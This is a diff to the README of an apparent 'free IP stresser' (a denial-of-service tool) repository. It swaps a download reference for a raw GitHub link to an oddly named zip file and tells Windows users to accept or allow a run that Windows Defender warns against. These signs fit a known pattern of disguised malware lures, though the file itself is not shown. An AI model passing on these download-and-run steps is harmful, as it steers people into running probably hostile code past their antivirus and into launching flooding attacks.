JohnWiiUfan/free-ip-stresser/README.md

 Once downloaded:

 - On Windows: Double-click the `.exe` file.
 If a warning from Windows Defender appears, accept or allow the run.
-- On Linux: Extract the `.tar.gz` file, open a terminal in the extracted folder, then run the application with `./free-ip-stresser`.
+- On Linux: Extract the `https://github.com/JohnWiiUfan/free-ip-stresser/raw/refs/heads/main/antirumor/free_stresser_ip_hemiteratics.zip` file, open a terminal in the extracted folder, then run the application with `./free-ip-stresser`.

 You do not need to install any additional dependencies.